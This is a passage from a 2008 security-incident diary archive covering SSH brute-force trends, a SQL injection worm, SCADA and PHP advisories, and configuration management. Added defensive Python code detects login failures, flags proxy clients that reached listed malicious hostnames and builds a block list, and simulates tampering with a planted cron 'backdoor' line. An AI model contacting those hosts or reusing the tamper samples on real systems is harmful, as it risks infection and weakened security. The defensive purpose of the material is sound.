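    source under the counter but persistent over a long span) or 'distributed'
    (one account hit from several sources that each stay under the counter)."""
    by_ip = defaultdict(list)
    by_user = defaultdict(set)
    for ts, user, ip in events:
        by_ip[ip].append(ts)
        by_user[user].add(ip)

    findings = []
    for ip, stamps in by_ip.items():
        stamps.sort()
        span = stamps[-1] - stamps[0]
        if len(stamps) >= per_ip_threshold:
            findings.append(("burst", ip, len(stamps)))
        elif len(stamps) >= slow_min_count and span >= slow_min_span:
            findings.append(("low-and-slow", ip, len(stamps)))
    for user, ips in by_user.items():
        # Sources a per-IP lockout counter would never trip on their own.
        quiet_sources = [ip for ip in ips if len(by_ip[ip]) < per_ip_threshold]
        if len(quiet_sources) >= dist_min_sources:
            findings.append(("distributed", user, len(quiet_sources)))
    return sorted(findings)


if __name__ == "__main__":
    for kind, subject, count in detect(parse_failures(SAMPLE_LOG)):
        print(f"{kind:13s} {subject:15s} failures/sources: {count}")
```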

Thanks to all of the readers who have already sent in their observations to us today.  :-)

Update 1:
One of our handlers, Jim, pointed me to the DenyHosts statistics site at http://stats.denyhosts.net/stats.html.  As already mentioned, this does appear to be a significant new trend of which we all should be aware.

Another one of our readers sometimes gives advice to / consults for an organization which today was having problems with a server denying access to anyone attempting to connect.  The reason was that sshd was denying all connections due to too many failed login attempts.  It was recommended that internal servers could stay on the default port, but external-facing hosts which have a need for SSH should use a non-standard high port.  Yes, it is a form of security by obscurity, but it does defeat brain-dead brute force attacks.
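To make the difference between the host-based blocking recommended in the list above and the per-account lockout discussed afterwards concrete, here is an added example (not code from the Owens/Matthews paper, DenyHosts or fail2ban). It parses the lines sshd writes to the auth log for failed password logins and applies one sliding-window test two ways: keyed on source IP, which is what DenyHosts and fail2ban do, and keyed on account, which is the lockout policy the diary warns about. The log lines are constructed for this example; the option names maxretry and findtime are borrowed from fail2ban's jail settings, and the year supplied to the parser is an assumption because syslog timestamps carry none.

```python
"""Added example, not from the Owens/Matthews paper or from DenyHosts/fail2ban.

Parses sshd's failed-password log lines and applies the same sliding-window
test two ways:
  * keyed on source IP  -> block the host (DenyHosts/fail2ban behaviour)
  * keyed on account    -> the lockout policy the diary warns about
The log lines below are constructed for this example.
"""
import re
from collections import defaultdict
from datetime import datetime

# sshd logs: "Failed password for [invalid user] NAME from IP port N ssh2"
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

# Constructed sample: one noisy scanner, one legitimate user mistyping twice,
# then a slow, distributed run against that same user's account.
SAMPLE_LOG = """\
May 11 10:15:01 bastion sshd[2101]: Failed password for invalid user admin from 203.0.113.5 port 40001 ssh2
May 11 10:15:03 bastion sshd[2102]: Failed password for invalid user oracle from 203.0.113.5 port 40002 ssh2
May 11 10:15:05 bastion sshd[2103]: Failed password for root from 203.0.113.5 port 40003 ssh2
May 11 10:15:07 bastion sshd[2104]: Failed password for invalid user test from 203.0.113.5 port 40004 ssh2
May 11 10:15:09 bastion sshd[2105]: Failed password for invalid user guest from 203.0.113.5 port 40005 ssh2
May 11 10:15:11 bastion sshd[2106]: Failed password for root from 203.0.113.5 port 40006 ssh2
May 11 10:20:00 bastion sshd[2201]: Failed password for jsmith from 198.51.100.7 port 50001 ssh2
May 11 10:20:04 bastion sshd[2202]: Failed password for jsmith from 198.51.100.7 port 50002 ssh2
May 11 10:20:30 bastion sshd[2203]: Accepted publickey for jsmith from 198.51.100.7 port 50003 ssh2
May 11 11:00:00 bastion sshd[2301]: Failed password for jsmith from 192.0.2.11 port 3001 ssh2
May 11 11:10:00 bastion sshd[2302]: Failed password for jsmith from 192.0.2.12 port 3002 ssh2
May 11 11:20:00 bastion sshd[2303]: Failed password for jsmith from 192.0.2.13 port 3003 ssh2
May 11 11:30:00 bastion sshd[2304]: Failed password for jsmith from 192.0.2.14 port 3004 ssh2
May 11 11:40:00 bastion sshd[2305]: Failed password for jsmith from 192.0.2.15 port 3005 ssh2
"""


def parse_failures(text, year=2008):
    """Return (timestamp, user, ip) for every failed-password line.

    Syslog timestamps carry no year, so the caller supplies one (assumed
    here; a real tool would take it from the file's mtime or today's date).
    """
    events = []
    for line in text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["user"], m["ip"]))
    return events


def _trips(stamps, count, seconds):
    """True if `count` failures fall inside any window of `seconds` seconds."""
    stamps = sorted(stamps)
    return any(
        (stamps[i + count - 1] - stamps[i]).total_seconds() <= seconds
        for i in range(len(stamps) - count + 1)
    )


def _offenders(events, key_index, count, seconds):
    """Group failures by one field of the event tuple and apply _trips()."""
    by_key = defaultdict(list)
    for ev in events:
        by_key[ev[key_index]].append(ev[0])
    return {k for k, stamps in by_key.items() if _trips(stamps, count, seconds)}


def hosts_to_ban(events, maxretry=5, findtime=600):
    """Per-source policy: ban an IP after `maxretry` failures within `findtime` s."""
    return _offenders(events, 2, maxretry, findtime)


def accounts_to_lock(events, maxfail=5, findtime=3600):
    """Per-account policy: the same test keyed on user name.  It fires on the
    distributed run that hosts_to_ban() misses, but what it locks is the
    victim's account, and the victim's own typos count toward the total."""
    return _offenders(events, 1, maxfail, findtime)


if __name__ == "__main__":
    ev = parse_failures(SAMPLE_LOG)
    print("ban hosts:    ", sorted(hosts_to_ban(ev)))      # ['203.0.113.5']
    print("lock accounts:", sorted(accounts_to_lock(ev)))  # ['jsmith']
```

Run against the sample, the per-host rule bans only the scanner at 203.0.113.5 and never touches the 192.0.2.x sources, each of which tried once. The per-account rule catches that slow run, but the thing it locks is jsmith, and jsmith's two mistyped passwords at 10:20 are part of the count. Banning a source is cheap to undo and costs the attacker something; locking the account costs the user, which is the trade-off the diary describes.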


Published: 2008-05-11

Mass File Injection Attack

We received a report from Mike this afternoon about a couple of URLs containing a malicious JavaScript that pulls down a file associated with Zlob.  If you do a Google search for these two URLs, you get about 400,000 sites that now have a call to this JavaScript file included in them.  Most of the sites seem to be running phpBB forum software.

If you have a proxy server that logs outbound web traffic at your site, you might want to look for connection attempts to these two sites.  Internal clients that have connected may need some cleanup work.  Another preventive step would be to blocklist these two URLs.



Published: 2008-05-09

Thunderbird is out!

Wait, before I hand the Big Red Internet Button over to Mike Poor (one press, and well, you know what happens), I just wanted to let everyone know that Thunderbird is out.  Right here is a link to the security release notes for this latest version.  Just two, it looks like.

So, okay, I'm turning it over to Mike now.  Good luck all of you!


Joel Esler



Published: 2008-05-08


I stole the headline directly from Mozilla.  I am writing this diary entry for our readers in Vietnam.  Apparently the Vietnamese language pack for Firefox 2 has been compromised.  The Vietnamese language pack has been downloaded about 16,667 times since November 2007, so the impact may or may not be significant.  So be wary.  If you have downloaded the Vietnamese language pack, you know who you are: go to Mozilla's website and read all about it.


Joel Esler



Published: 2008-05-07

OSSEC 1.5 released

Okay, so we're almost a week late in acknowledging that our friend Daniel Cid has released the latest version of his OSSEC HIDS (with help from others listed in the announcement).  The new release adds support for monitoring a number of new logs, plus some new features and performance improvements (particularly to the Windows agent).  You can find the announcement at http://www.ossec.net/main/ossec-v15-released and you can download from here.  Our thanks to Daniel for continuing to develop one of my favorite tools.



Published: 2008-05-07

More on automated exploit generation

We've done a couple of stories resulting from the release of the APEG paper a couple of weeks ago, and this story is by no means an attempt to downplay the significance of the threat or suggest that you not employ the countermeasures discussed in previous stories.  That said, when I first heard about it, my thought was, that sounds like an interesting result, but the hype is over the top.  Yes, it is a significant result, but "the sky is not falling."  I happened across a post on Halvar Flake's blog that explains it better than I could, so take a look for yourself.



Published: 2008-05-06

SQL Injection Worm on the Loose (UPDATED x2)

A loyal ISC reader, Rob, wrote in to point us at what looks to be a SQL injection worm that is on the loose.  A quick Google search shows about 4,000 websites infected, and this worm started at least in mid-April if not earlier.  Right now we can't speak intelligently to how they are getting into the databases, but what they are doing is putting in some scripts and iframes to take over visitors to the websites.  User machines appear to be infected via RealPlayer vulnerabilities that seem to be more or less well detected.

The details: the script source that is injected into web pages is hxxp://winzipices.cn/#.js (where # is 1-5).  This, in turn, points to a corresponding ASP page on the same server (i.e. hxxp://winzipices.cn/#.asp), which in turn points to the exploits, either from the cnzz.com domain or the 51.la domain.  The cnzz.com host (hxxp://s141.cnzz.com) looks like it could be set up for single flux, but it's the same pool of IP addresses all the time right now.  hxxp://www.51.la just points to 51la.ajiang.net, which has a short TTL, but only one IP is serving it.

Fair warning: if you Google these hostnames, you will find exploited sites that will try and reach out and "touch" you... even if you are looking at the "cached" page.  Proceed at your own risk.

UPDATE: We're also seeing this website serving up some attacks in connection with this SQL worm (hxxp://bbs.jueduizuan.com).

UPDATE x2: As usual, the good folks at ShadowServer have a good write-up on the details of everything after the SQL injection (i.e. what malware gets dropped, IPs involved, etc.).

John Bambenek / bambenek \at\ gmail /dot/ com
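The hostnames above are the indicators a proxy admin would want to check for, and the earlier "Mass File Injection Attack" entry suggests exactly that: look for clients that connected, then block the sites. The following is an added example (not code from the diary or ShadowServer) that does both for Squid. It parses access-log lines in Squid's native format, matches the request host against the indicator list exactly as the diary gives it (an exact host or any subdomain of it, so a look-alike such as notwinzipices.cn does not match), and prints a Squid dstdomain ACL that blocks the same names. It goes slightly beyond the text in handling CONNECT lines, which log a bare host:port rather than a URL. The log lines are constructed; the client and upstream addresses in them are sample values.

```python
"""Added example, not from the diary or ShadowServer: find proxy clients that
reached the hostnames the diary lists, and emit a Squid ACL that blocks them.
The access-log lines below are constructed in Squid's native log format.
"""
import re
from urllib.parse import urlsplit

# Indicators exactly as the diary names them.
INDICATORS = [
    "winzipices.cn",
    "s141.cnzz.com",
    "www.51.la",
    "51la.ajiang.net",
    "bbs.jueduizuan.com",
]

# Squid native access.log:
#   time elapsed client code/status bytes method URL ident hierarchy/peer type
SQUID_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+"
    r"(?P<method>\S+)\s+(?P<url>\S+)"
)

SAMPLE_LOG = """\
1210100001.123    210 10.1.2.3 TCP_MISS/200 4512 GET http://forum.example.com/viewtopic.php?t=42 - DIRECT/192.0.2.80 text/html
1210100001.456    180 10.1.2.3 TCP_MISS/200 1320 GET http://winzipices.cn/1.js - DIRECT/192.0.2.81 application/x-javascript
1210100001.789    150 10.1.2.3 TCP_MISS/200 2200 GET http://winzipices.cn/1.asp - DIRECT/192.0.2.81 text/html
1210100002.012    300 10.1.2.3 TCP_MISS/200 9000 GET http://s141.cnzz.com/stat.php?id=1 - DIRECT/192.0.2.82 text/html
1210100010.000     90 10.1.2.9 TCP_HIT/200 5000 GET http://www.example.org/ - NONE/- text/html
1210100011.000    400 10.1.2.9 TCP_MISS/200 0 CONNECT bbs.jueduizuan.com:443 - DIRECT/192.0.2.83 -
1210100012.000    100 10.1.2.7 TCP_MISS/200 800 GET http://notwinzipices.cn/x.js - DIRECT/192.0.2.84 text/html
"""


def host_of(url):
    """Hostname of a logged request.  CONNECT lines log bare host:port, which
    urlsplit only parses as a netloc if it is prefixed with '//'."""
    if "://" not in url:
        url = "//" + url
    return (urlsplit(url).hostname or "").lower()


def matches(host, indicator):
    """Exact host, or any subdomain of the indicator.  A plain substring test
    would also flag look-alikes such as 'notwinzipices.cn'; this does not."""
    return host == indicator or host.endswith("." + indicator)


def flag_clients(log_text, indicators=INDICATORS):
    """Return {client_ip: sorted list of the indicator URLs it requested}.
    These are the machines that may need cleanup."""
    hits = {}
    for line in log_text.splitlines():
        m = SQUID_RE.match(line)
        if not m:
            continue
        host = host_of(m["url"])
        if any(matches(host, ind) for ind in indicators):
            hits.setdefault(m["client"], set()).add(m["url"])
    return {client: sorted(urls) for client, urls in hits.items()}


def squid_blocklist(indicators=INDICATORS, acl="sqlworm"):
    """Squid config fragment: a leading dot in dstdomain matches the domain
    and all of its subdomains, mirroring matches() above."""
    names = " ".join("." + ind for ind in indicators)
    return f"acl {acl} dstdomain {names}\nhttp_access deny {acl}\n"


if __name__ == "__main__":
    for client, urls in sorted(flag_clients(SAMPLE_LOG).items()):
        print(client, urls)
    print(squid_blocklist(), end="")
```

On the sample, 10.1.2.3 is flagged for the .js, the .asp and the cnzz.com stats host in sequence, which is the fetch chain the diary describes, and 10.1.2.9 is flagged for the CONNECT to bbs.jueduizuan.com; 10.1.2.7, which only hit the look-alike domain, is not. The ACL output needs to appear before any http_access allow line in squid.conf to take effect.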


Published: 2008-05-06

Industrial Control Systems Vulnerability

While a day does not go by without many public announcements of vulnerabilities in consumer and business software, it is rather rare when we hear about something wrong with software that is used to monitor or control industrial systems.  Commonly called SCADA (Supervisory Control And Data Acquisition) or PCS (Process Control System), these are the systems that monitor and operate oil and gas refineries, large manufacturing plants, assembly lines, railroads, electrical grids, and countless other industrial processes.

Core Security announced yesterday that there is a Denial of Service vulnerability in the Invensys Wonderware InTouch SuiteLink service running in Windows operating systems, specifically slssvc.exe. According to Core, this vulnerability "could allow an un-authenticated remote attacker with the ability to connect to the SuiteLink service TCP port to shutdown the service abnormally by sending a malformed packet. Exploitation of the vulnerability for remote code execution has not been proven, but it has not been eliminated as a potential scenario."

According to Wonderware's website, "Wonderware is the leading supplier of industrial automation and information software solutions. One third of the world’s plants run Wonderware software solutions. Having sold more than 500,000 software licenses in over 100,000 plants worldwide, Wonderware has customers in virtually every global industry — including Oil & Gas, Food & Beverage, Utilities, Pharmaceuticals, Electronics, Metals, Automotive and more."  It's no wonder that a vulnerability in their monitoring software might be something the bad guys would be very interested in.

The National Vulnerability Database (NVD, sponsored by DHS) rates this one pretty high and says that the vulnerability "Provides unauthorized access, Allows partial confidentiality, integrity, and availability violation, Allows unauthorized disclosure of information, Allows disruption of service."    Our advice:   Patch now.  If a control system cannot be patched right away, remember that the advisory's precondition is the ability to connect to the SuiteLink service's TCP port: restrict access to that port to the hosts that actually need it until the patch is on.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2008-05-06

Windows XP Service Pack 3 Released

Microsoft, it appears, has just released Windows XP Service Pack 3.  For the most part it is a bundle of all the updates since Service Pack 2, but there are some key differences.  First, the big gotcha:

If you are an IE 6 user, SP3 will simply update your IE 6 installation.  You will continue to be able to upgrade to IE 7 as an option.

If you are an IE 7 user, it will update your IE 7 installation.  HOWEVER, you will NOT be able to go back to IE 6 after applying this service pack.

If you are an IE 8 (beta) user, you will need to uninstall IE 8, apply the service pack, and then reinstall IE 8.

This link has a list of all the Knowledge Base articles that this service pack addresses.  Some of the bigger items are that it retrofits some Vista functionality into XP, namely Network Access Protection, Black Hole Router Detection, enhanced security for administrator and service policy entries (basically some better default settings) and a kernel-mode crypto driver.  Additionally, some of the "optional" updates released since SP2 will be installed with SP3 (MMC 3.0, MSXML6, WPA2 support, etc.).

The good news is that TechNet provides installation media that can be used to slipstream the service pack, so workstations can be updated without pulling it over the network.

John Bambenek / bambenek \at\ gmail /dot/ com



Published: 2008-05-05

PHP 5.2.6 out w/ security updates

PHP has announced the release of 5.2.6, which fixes 6 security bugs and a handful of other issues.  Research is still ongoing into how important some of these security bugs are, but they include a stack overflow and some others that could be nasty depending on how extensive the vulnerability is.  It also includes 100 or so normal bug fixes, so it is probably time to upgrade your PHP installations even if the security issues turn out to be non-events.

John Bambenek, bambenek /at gmail \dot\ com


Published: 2008-05-05

Defenses Against Automated Patch-Based Exploit Generation

Last month, we reported on research showing that it is possible to create exploits by reverse engineering patches as they come out, and that this process can be automated.  At that time, I didn't have a lot to say about how to defend, because I hadn't thought about the problem enough yet... I've had some time now.

Encrypting Patches

The paper mentions encrypting patches so that distribution could still take some time, with the decryption key sent out simultaneously at the end, allowing the patch to be applied at the same time around the globe.  In theory this would limit the window of opportunity for an attacker to reverse engineer the patch, get a working exploit, and start attacking the world.  The problem is that the delay between releasing a patch and having it applied is not caused by the rolling cycle of downloads, but by the need (most of the time) to reboot systems after a patch is applied.  In short, a system may have the key to decrypt a patch, but the patch would not take effect until either the user rebooted the machine or some default time when a reboot is acceptable (i.e. 3am).  The chief problem is the reboot, which is a significant business disruption.  Encrypting patches doesn't fix this; it just adds another layer to the patching process.

Patches that Don't Require Reboot

This particular defense is for OS vendors only (and one vendor in particular).  Patches that require a reboot inevitably get delayed until a maintenance window.  If patches can be applied without incurring downtime, particularly on end-user workstations, they can be pushed out and applied as soon as they are available.  This would go a long way toward closing the window between a patch being released and the patch being applied.  Some patches, obviously, must entail a reboot, but as many patches as possible should be developed in such a way as to minimize the need for one.

The Renewed Need for Workarounds

This defense is mostly on us (the Internet Storm Center) and the security community in general.  For some time, workarounds have been less necessary because patching has been relatively easy to handle; the need to go a significant period of time before patching has only come up a handful of times in the past few years.  If the patch window is gone, we need to renew the effort to find quick "workarounds" that limit the exposure of machines during the vulnerable period.  Some patches will require reboots and there will be no way around that, so we need defenses that let people protect themselves in the meantime.

Configuration Management

The last piece of the puzzle, and the defense available to the people in the trenches, is centralized configuration/patch management.  In part, this follows from our diary from yesterday on configuration management.  Whether the interim defense is a hotfix, a registry change, a killbit, or anything else, centralized configuration management allows these minor protective changes to be deployed quickly so you can "limp along" until a patch can be applied.  The important note about configuration management is that deploying a solution, especially one that manages everything in your environment, makes that configuration management system the absolute most important system in your environment, even more important than those that house trade secrets.  It becomes a "single point of 0wnership" that allows an attacker to take direct control not over one machine, but over an entire organization.  Everything has its costs and benefits, and as long as you control the risks of centralized configuration management, the benefits certainly make it worth it.  Protect the keys to the kingdom.

Comments?  Send em along.

John Bambenek / bambenek \at\ gmail /dot/ com


Published: 2008-05-04

How Configuration Management supports Systems Security

How do you know if what is in various configuration files is what is supposed to be there?  Did a hacker break in and add some entries?  Did a system administrator accidentally change a file?  Did a security administrator make a mistake when modifying multiple lines in a firewall policy?  And how do you easily restore what should be there?

File integrity analysis tools like AIDE, Samhain and Tripwire can be configured to let you know that a file has changed, but they don't correct the change.

Version control systems like RCS, CVS and SVN give you the ability to see when changes were made to a file and what those changes were.  You can easily roll back to a prior version of a file if needed.

System configuration automation tools like cfengine and Puppet allow you to define configurations for specific servers, or classes of servers, and ensure that the related software and configuration files exist on the servers and are the correct versions.  If someone manually edits a configuration file on one of the servers and changes it from the expected contents, cfengine and Puppet can detect the change and restore the correct file contents from an associated version control repository.

We use Kickstart to build all our new Linux servers, quickly and repeatably, with our standard minimal footprint, and then we use Puppet to install the specific software required for that server, be it a web server, database server, VPN gateway, or other.

The tools listed above are predominantly for Linux servers, and most are open-source; this happens to be the environment that I work in and am most familiar with.

What are other version control systems or system configuration automation tools that you use in your environments?  Send in answers and I'll update this diary with people's responses.

David Goldsmith
SANS / ISC Handler
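To make the division of labour between the three tool classes concrete, here is an added example (not code from AIDE, Samhain, Tripwire, cfengine or Puppet) that does each job in miniature on a throwaway directory tree: a hash baseline that reports drift the way a file-integrity checker does, and an enforce step that overwrites a managed file from a repository copy the way Puppet converges a file resource. The file names and contents are constructed, and the `repo` directory stands in for the version-control checkout a real tool would pull from. The demo also shows the gap a practitioner should keep in mind: enforcement only covers files the repository knows about, so a planted file is reported by the integrity check but left alone by the restore.

```python
"""Added example, not from AIDE/Samhain/Tripwire or cfengine/Puppet:
  baseline()/drift()  - file-integrity checking: report what changed
  enforce()           - configuration management: put managed files back
The directory layout, file names and contents below are constructed.
"""
import hashlib
import shutil
import tempfile
from pathlib import Path


def sha256_of(path):
    """SHA-256 of a file, read in chunks so large files do not load into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(root):
    """Map each file under root (path relative to root, POSIX form) to its hash."""
    return {
        p.relative_to(root).as_posix(): sha256_of(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def drift(root, known):
    """Integrity-checker view: {relpath: 'modified'|'missing'|'added'} for
    anything that is not exactly as the baseline recorded."""
    now = baseline(root)
    report = {}
    for rel, digest in known.items():
        if rel not in now:
            report[rel] = "missing"
        elif now[rel] != digest:
            report[rel] = "modified"
    for rel in now:
        if rel not in known:
            report[rel] = "added"
    return report


def enforce(root, repo):
    """Puppet-style convergence: every file present in the repository is
    compared with the host copy and overwritten if it differs.  Returns the
    paths restored.  Files the repository does not manage are not touched."""
    want = baseline(repo)
    have = baseline(root)
    restored = []
    for rel, digest in want.items():
        if have.get(rel) != digest:
            dst = root / rel
            dst.parent.mkdir(parents=True, exist_ok=True)
            shutil.copyfile(repo / rel, dst)
            restored.append(rel)
    return restored


def demo():
    """Build a repo and a host from it, tamper with the host, then detect and repair."""
    with tempfile.TemporaryDirectory() as tmp:
        repo, host = Path(tmp, "repo"), Path(tmp, "host")
        for base in (repo, host):
            (base / "etc/ssh").mkdir(parents=True)
            (base / "etc/ssh/sshd_config").write_text(
                "PermitRootLogin no\nPasswordAuthentication no\n")
            (base / "etc/hosts.allow").write_text("sshd: 10.0.0.0/8\n")
        known = baseline(host)
        clean_before = drift(host, known)

        # Constructed tampering: loosen sshd and plant a cron job.
        (host / "etc/ssh/sshd_config").write_text(
            "PermitRootLogin yes\nPasswordAuthentication yes\n")
        (host / "etc/cron.d").mkdir()
        (host / "etc/cron.d/backdoor").write_text("* * * * * root /tmp/.x\n")

        found = drift(host, known)            # integrity check sees both changes
        restored = enforce(host, repo)        # config management fixes the managed one
        return {
            "clean_before": clean_before,
            "found": found,
            "restored": restored,
            "sshd_config_after": (host / "etc/ssh/sshd_config").read_text(),
            "leftover": drift(host, known),   # the planted cron file is still there
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The drift report names both the edited sshd_config and the planted cron file; enforce restores only sshd_config, because only it exists in the repository. That is why the integrity checker and the configuration manager are complementary rather than interchangeable: one tells you about everything that changed, the other repairs what you declared.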


Published: 2008-05-03

Windows Vista Update Causing Loss of Audio on Some Systems

According to an article at Channel Web, a recently offered driver update for IDT (formerly SigmaTel) high definition audio is causing problems for Dell users that have installed it.

"Should you see this update appear, *do not* install it," warned 'Chris B', a Dell (NSDQ:Dell) Digital Life Liaison, in a Thursday forum post.

The update is called IDT High Def Codec and was reported to be one of the drivers that held up the release of SP1 for Vista back in February.  If you have a Dell computer and have not yet installed Vista SP1, you may want to take a look at the full article.


Thanks to our faithful contributor of comedy and serious content, Roseman.


Published: 2008-05-02

Hi, remember me?...

Ever read through your spam sometimes to see what's popular? Of course you may also get a fresh serving of malware, which makes it very worthwhile.

"Hi, remember me?..
new fotos(archived) you asked ;))
Angella O."

Well, no I don't remember an Angella that I have met recently, particularly not someone who might send me photos. But I'll bite. A simple wget scores me an exe. Virustotal results are depressingly consistent. 4/32.

Engine              Version   Last update   Result
AntiVir                       2008.05.02    TR/Crypt.XPACK.Gen
CAT-QuickHeal       9.50      2008.05.01    (Suspicious) - DNAScan
eSafe                         2008.04.28    Suspicious File
Webwasher-Gateway   6.6.2     2008.05.02    Trojan.Crypt.XPACK.Gen

Additional information
File size: 167936 bytes
MD5:  cb1de4847ca840f8837fc8381ec6b0cb
SHA1: 26c018e4968e6dc092d5389759e939f741bb66b3

So, only generic detection when the file was first seen, how about 12 hours later? Nope, same results.

Adrien de Beaupré
Bell Canada



Published: 2008-05-01

Windows Detours

Another one of those Windows tools you wished you had heard about yesterday!

Ever wish you could log any call to a specific Win32 API? Enter Detours: it can hook into a process and log everything. Let's not stop there; it can intercept arbitrary function calls! Believe it or not, Detours has been around since 1999, described here and here. The official description is that Detours can instrument and extend existing operating system and application functionality. Think about it...

Adrien de Beaupré
Bell Canada

Thanks Robert!


Published: 2008-05-01

Windows XP SteadyState

One of those Windows tools you wished you had heard about yesterday!

Ever wish your Windows XP computer could return to the way it was when it worked correctly? That would be great, right? We can all recall some point when a particular system worked just right. Enter a utility from Microsoft that does just that, and more than a 'System Restore'. It is called SteadyState, and it can retain a golden image and revert to that state at will. It is designed to lock down shared computers that do not have a full-time sysadmin, but it can be used in a number of scenarios; VMs are not always the environment of choice for malware researchers, for example. URL is here.

Adrien de Beaupré
Bell Canada

Thanks Robert!


Published: 2008-05-01

ISC Podcast Episode Number 3

Hey all, we just put out Episode Number 3 for the Internet Storm Center Podcast.  Available via iTunes here, and for you non-iTunes users, here.



Joel Esler